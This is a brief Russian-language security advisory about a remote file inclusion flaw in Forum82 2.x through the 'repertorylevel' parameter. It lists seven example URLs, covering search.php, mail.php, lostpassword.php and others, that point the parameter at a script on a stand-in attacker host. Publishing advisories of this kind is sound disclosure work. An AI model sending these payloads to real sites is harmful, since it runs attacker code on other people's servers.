Программа: Forum82 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "repertorylevel" различными сценариями.

Примеры:

http://sitename.com/[Forum82_Installed_DIR]/forum/search.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/message.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/member.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php? repertorylevel=http://evilsite.com/evilscript.txt?

http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3? repertorylevel=http://evilsite.com/evilscript.txt?

Оставить мнение